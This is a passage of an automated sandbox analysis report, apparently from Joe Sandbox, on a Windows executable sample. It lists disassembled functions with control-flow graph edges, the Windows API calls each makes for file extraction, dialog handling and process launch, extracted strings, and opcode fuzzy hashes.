101ca42-101ca4a call 1027686 421->426 427 101ca3d-101ca3f 421->427 422->369 428 101ca53-101ca5a call 1023e2e 422->428 426->422 427->426 428->369 447 101cc11-101cc62 call 1010602 call 101b1be GetDlgItem SetWindowTextW SendMessageW call 1023e49 429->447 448 101cc06-101cc0a 429->448 453 101c855-101c869 SetFileAttributesW 436->453 454 101c9aa-101c9b9 call 100a55a 436->454 440 101cbab-101cbce call 1023e13 * 2 437->440 441 101cb7f-101cb97 call 1023e13 437->441 464 101cb6a 438->464 465 101cb6c-101cb6e 438->465 440->429 473 101cbd0-101cbde call 10105da 440->473 441->440 458 101cb99-101cba6 call 10105da 441->458 480 101cc67-101cc6b 447->480 448->447 452 101cc0c-101cc0e 448->452 452->447 459 101c90f-101c91f GetFileAttributesW 453->459 460 101c86f-101c8a2 call 100b991 call 100b690 call 1023e13 453->460 454->369 458->440 459->436 470 101c921-101c930 DeleteFileW 459->470 490 101c8b5-101c8c3 call 100bdb4 460->490 491 101c8a4-101c8b3 call 1023e13 460->491 464->465 465->437 470->436 472 101c932-101c935 470->472 477 101c939-101c965 call 1004092 GetFileAttributesW 472->477 473->429 488 101c937-101c938 477->488 489 101c967-101c97d MoveFileW 477->489 480->369 485 101cc71-101cc85 SendMessageW 480->485 485->369 488->477 489->436 492 101c97f-101c989 MoveFileExW 489->492 490->454 497 101c8c9-101c908 call 1023e13 call 101fff0 490->497 491->490 491->497 492->436 497->459
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0101C744
                                                                                      • Part of subcall function 0101B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0101B3FB
                                                                                    • _wcslen.LIBCMT ref: 0101CA0A
                                                                                    • _wcslen.LIBCMT ref: 0101CA13
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0101CA71
                                                                                    • _wcslen.LIBCMT ref: 0101CAB3
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0101CBFB
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0101CC36
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0101CC46
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0104A472), ref: 0101CC54
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101CC7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                    • API String ID: 2804936435-312220925
                                                                                    • Opcode ID: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
                                                                                    • Instruction ID: e6db691cefd8ca8a875add66c14126a9a7072d941056ed0adb8c4b6cead1a4d9
                                                                                    • Opcode Fuzzy Hash: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
                                                                                    • Instruction Fuzzy Hash: 3BE15672940219AAEF25DBA4DD84DEF77BDAB04310F4484A5F689E7044EF78DA848F60
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0100DA70
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0100DAAC
                                                                                      • Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2
                                                                                      • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                                                      • Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,00010442), ref: 01011BA0
                                                                                    • _wcslen.LIBCMT ref: 0100DDE9
                                                                                    • __fprintf_l.LIBCMT ref: 0100DF1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                    • API String ID: 566448164-801612888
                                                                                    • Opcode ID: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
                                                                                    • Instruction ID: 10198a46e4c69a33095d90e25fc94161ad86905a06cce3ab82b0c1cdb0c49dbe
                                                                                    • Opcode Fuzzy Hash: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
                                                                                    • Instruction Fuzzy Hash: 6332F571900219DBEF66EFA8C840BEE77A5FF58300F40459AFA85AB2C1E771D985CB50

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                                                      • Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                                                      • Part of subcall function 0101B568: IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
                                                                                      • Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
                                                                                      • Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6
                                                                                    • GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID: \
                                                                                    • API String ID: 3569833718-2967466578
                                                                                    • Opcode ID: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
                                                                                    • Instruction ID: c9aa6529565a70fbb63a8f8a88daa3aff777f91894fdf6d2c519e8e4b290dabb
                                                                                    • Opcode Fuzzy Hash: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
                                                                                    • Instruction Fuzzy Hash: 2E31C171545341ABE321DF249C5AFAB7FACFB82704F00090DFAD59A194DB6A890887B6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 836 101d78f-101d7a7 call 101ec50 839 101d9e8-101d9f0 836->839 840 101d7ad-101d7b9 call 1023e13 836->840 840->839 843 101d7bf-101d7e7 call 101fff0 840->843 846 101d7f1-101d7ff 843->846 847 101d7e9 843->847 848 101d801-101d804 846->848 849 101d812-101d818 846->849 847->846 850 101d808-101d80e 848->850 851 101d85b-101d85e 849->851 852 101d810 850->852 853 101d837-101d844 850->853 851->850 854 101d860-101d866 851->854 855 101d822-101d82c 852->855 856 101d9c0-101d9c2 853->856 857 101d84a-101d84e 853->857 858 101d868-101d86b 854->858 859 101d86d-101d86f 854->859 860 101d81a-101d820 855->860 861 101d82e 855->861 862 101d9c6 856->862 857->862 863 101d854-101d859 857->863 858->859 864 101d882-101d898 call 100b92d 858->864 859->864 865 101d871-101d878 859->865 860->855 868 101d830-101d833 860->868 861->853 870 101d9cf 862->870 863->851 871 101d8b1-101d8bc call 100a231 864->871 872 101d89a-101d8a7 call 1011fbb 864->872 865->864 866 101d87a 865->866 866->864 868->853 873 101d9d6-101d9d8 870->873 882 101d8d9-101d8e6 ShellExecuteExW 871->882 883 101d8be-101d8d5 call 100b6c4 871->883 872->871 881 101d8a9 872->881 876 101d9e7 873->876 877 101d9da-101d9dc 873->877 876->839 877->876 880 101d9de-101d9e1 ShowWindow 877->880 880->876 881->871 882->876 885 101d8ec-101d8f9 882->885 883->882 886 101d8fb-101d902 885->886 887 101d90c-101d90e 885->887 886->887 889 101d904-101d90a 886->889 890 101d910-101d919 887->890 891 101d925-101d944 call 101dc3b 887->891 889->887 892 101d97b-101d987 CloseHandle 889->892 890->891 899 101d91b-101d923 ShowWindow 890->899 891->892 905 101d946-101d94e 891->905 893 101d989-101d996 call 1011fbb 892->893 894 101d998-101d9a6 892->894 893->870 893->894 894->873 898 101d9a8-101d9aa 894->898 898->873 902 101d9ac-101d9b2 898->902 899->891 902->873 904 101d9b4-101d9be 902->904 904->873 905->892 906 101d950-101d961 GetExitCodeProcess 905->906 906->892 907 101d963-101d96d 906->907 908 101d974 907->908 909 101d96f 907->909 908->892 909->908
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0101D7AE
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0101D8DE
                                                                                    • ShowWindow.USER32(?,00000000), ref: 0101D91D
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0101D959
                                                                                    • CloseHandle.KERNEL32(?), ref: 0101D97F
                                                                                    • ShowWindow.USER32(?,00000001), ref: 0101D9E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                    • String ID: .exe$.inf
                                                                                    • API String ID: 36480843-3750412487
                                                                                    • Opcode ID: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
                                                                                    • Instruction ID: c4ee4b496d4d3682530d07e2f1b62b099e617e5530fc4bf4c4aa353c1e57ac78
                                                                                    • Opcode Fuzzy Hash: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
                                                                                    • Instruction Fuzzy Hash: 5F510770404380AAFB719FA8D448BAB7FE6AF81744F04049EFAC89B199D77DC544CB52

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 910 102a95b-102a974 911 102a976-102a986 call 102ef4c 910->911 912 102a98a-102a98f 910->912 911->912 919 102a988 911->919 913 102a991-102a999 912->913 914 102a99c-102a9c0 MultiByteToWideChar 912->914 913->914 916 102ab53-102ab66 call 101fbbc 914->916 917 102a9c6-102a9d2 914->917 920 102aa26 917->920 921 102a9d4-102a9e5 917->921 919->912 923 102aa28-102aa2a 920->923 924 102a9e7-102a9f6 call 1032010 921->924 925 102aa04-102aa15 call 1028e06 921->925 927 102aa30-102aa43 MultiByteToWideChar 923->927 928 102ab48 923->928 924->928 937 102a9fc-102aa02 924->937 925->928 938 102aa1b 925->938 927->928 931 102aa49-102aa5b call 102af6c 927->931 932 102ab4a-102ab51 call 102abc3 928->932 939 102aa60-102aa64 931->939 932->916 941 102aa21-102aa24 937->941 938->941 939->928 942 102aa6a-102aa71 939->942 941->923 943 102aa73-102aa78 942->943 944 102aaab-102aab7 942->944 943->932 945 102aa7e-102aa80 943->945 946 102ab03 944->946 947 102aab9-102aaca 944->947 945->928 948 102aa86-102aaa0 call 102af6c 945->948 949 102ab05-102ab07 946->949 950 102aae5-102aaf6 call 1028e06 947->950 951 102aacc-102aadb call 1032010 947->951 948->932 965 102aaa6 948->965 954 102ab41-102ab47 call 102abc3 949->954 955 102ab09-102ab22 call 102af6c 949->955 950->954 964 102aaf8 950->964 951->954 963 102aadd-102aae3 951->963 954->928 955->954 968 102ab24-102ab2b 955->968 967 102aafe-102ab01 963->967 964->967 965->928 967->949 969 102ab67-102ab6d 968->969 970 102ab2d-102ab2e 968->970 971 102ab2f-102ab3f WideCharToMultiByte 969->971 970->971 971->954 972 102ab6f-102ab76 call 102abc3 971->972 972->932
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01025695,01025695,?,?,?,0102ABAC,00000001,00000001,2DE85006), ref: 0102A9B5
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0102AA3B
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0102AB35
                                                                                    • __freea.LIBCMT ref: 0102AB42
                                                                                      • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                                                    • __freea.LIBCMT ref: 0102AB4B
                                                                                    • __freea.LIBCMT ref: 0102AB70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
                                                                                    • Instruction ID: e17c86f3446af1b8c4c6623feef010b685c642ecf620bf1de52a145ebc82628d
                                                                                    • Opcode Fuzzy Hash: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
                                                                                    • Instruction Fuzzy Hash: 1B51B472700226EFEB268E68CC51EAFBBEAEB44610B154A69FD84D7542DF34DC50C650

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 975 1023b72-1023b7c 976 1023bee-1023bf1 975->976 977 1023bf3 976->977 978 1023b7e-1023b8c 976->978 979 1023bf5-1023bf9 977->979 980 1023b95-1023bb1 LoadLibraryExW 978->980 981 1023b8e-1023b91 978->981 984 1023bb3-1023bbc GetLastError 980->984 985 1023bfa-1023c00 980->985 982 1023b93 981->982 983 1023c09-1023c0b 981->983 987 1023beb 982->987 983->979 988 1023be6-1023be9 984->988 989 1023bbe-1023bd3 call 1026088 984->989 985->983 986 1023c02-1023c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 1023bd5-1023be4 LoadLibraryExW 989->992 992->985 992->988
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,01023C35,?,?,01062088,00000000,?,01023D60,00000004,InitializeCriticalSectionEx,01036394,InitializeCriticalSectionEx,00000000), ref: 01023C03
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3664257935-2084034818
                                                                                    • Opcode ID: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
                                                                                    • Instruction ID: 315f4e2644b309b458b7cef3ff9711bcc3eb08a1390a7496eea3b5bbdac81b15
                                                                                    • Opcode Fuzzy Hash: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
                                                                                    • Instruction Fuzzy Hash: 7211C435A04235ABDB338E6C9C8079D77A8BB09660F110150FAD1EF284D72AE90087D0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 993 101abab-101abca GetClassNameW 994 101abf2-101abf4 993->994 995 101abcc-101abe1 call 1011fbb 993->995 997 101abf6-101abf8 994->997 998 101abff-101ac01 994->998 1000 101abf1 995->1000 1001 101abe3-101abef FindWindowExW 995->1001 997->998 1000->994 1001->1000
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0101ABC2
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0101ABF9
                                                                                      • Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0101ABE9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                    • String ID: @Ut$EDIT
                                                                                    • API String ID: 4243998846-2065656831
                                                                                    • Opcode ID: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
                                                                                    • Instruction ID: fdef43b3eb64f9e5ee46f2791b8f376966dc1bd59d8439ba5046b73dfb4533c0
                                                                                    • Opcode Fuzzy Hash: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
                                                                                    • Instruction Fuzzy Hash: 57F0E232701268BAEA3056289C09FDB7AACAB42B00F080451FA84E71C8D769D94586F5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                                                      • Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                                                    • OleInitialize.OLE32(00000000), ref: 0101AC2F
                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
                                                                                    • SHGetMalloc.SHELL32(01048438), ref: 0101AC70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                    • String ID: riched20.dll$3Qo
                                                                                    • API String ID: 3498096277-4232643773
                                                                                    • Opcode ID: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
                                                                                    • Instruction ID: de0c2c066df0be36b2813305af08cdc1cff539e17a37911c3627e3cde9ae58f5
                                                                                    • Opcode Fuzzy Hash: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
                                                                                    • Instruction Fuzzy Hash: 90F012B1D0020AABDB10AFA9D8489DFFFFCFF94700F00415AE895E6205DBB856458FA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1006 10098e0-1009901 call 101ec50 1009 1009903-1009906 1006->1009 1010 100990c 1006->1010 1009->1010 1011 1009908-100990a 1009->1011 1012 100990e-100991f 1010->1012 1011->1012 1013 1009921 1012->1013 1014 1009927-1009931 1012->1014 1013->1014 1015 1009933 1014->1015 1016 1009936-1009943 call 1006edb 1014->1016 1015->1016 1019 1009945 1016->1019 1020 100994b-100996a CreateFileW 1016->1020 1019->1020 1021 10099bb-10099bf 1020->1021 1022 100996c-100998e GetLastError call 100bb03 1020->1022 1024 10099c3-10099c6 1021->1024 1026 10099c8-10099cd 1022->1026 1028 1009990-10099b3 CreateFileW GetLastError 1022->1028 1024->1026 1027 10099d9-10099de 1024->1027 1026->1027 1029 10099cf 1026->1029 1030 10099e0-10099e3 1027->1030 1031 10099ff-1009a10 1027->1031 1028->1024 1032 10099b5-10099b9 1028->1032 1029->1027 1030->1031 1033 10099e5-10099f9 SetFileTime 1030->1033 1034 1009a12-1009a2a call 1010602 1031->1034 1035 1009a2e-1009a39 1031->1035 1032->1024 1033->1031 1034->1035
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,01007760,?,00000005,?,00000011), ref: 0100995F
                                                                                    • GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100996C
                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,01007760,?,00000005,?), ref: 010099A2
                                                                                    • GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099AA
                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                    • String ID:
                                                                                    • API String ID: 1999340476-0
                                                                                    • Opcode ID: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
                                                                                    • Instruction ID: 222b96d065fb82373c182a2d9a11c53edd2b75b0e7c213ac18208096a4d53eee
                                                                                    • Opcode Fuzzy Hash: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
                                                                                    • Instruction Fuzzy Hash: 0F31F3305447466FF7329B2CCD85BDABBD8BB44324F100B19FAE9961C2D7A9A484CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1065 101b568-101b581 PeekMessageW 1066 101b583-101b597 GetMessageW 1065->1066 1067 101b5bc-101b5be 1065->1067 1068 101b599-101b5a6 IsDialogMessageW 1066->1068 1069 101b5a8-101b5b6 TranslateMessage DispatchMessageW 1066->1069 1068->1067 1068->1069 1069->1067
                                                                                    APIs
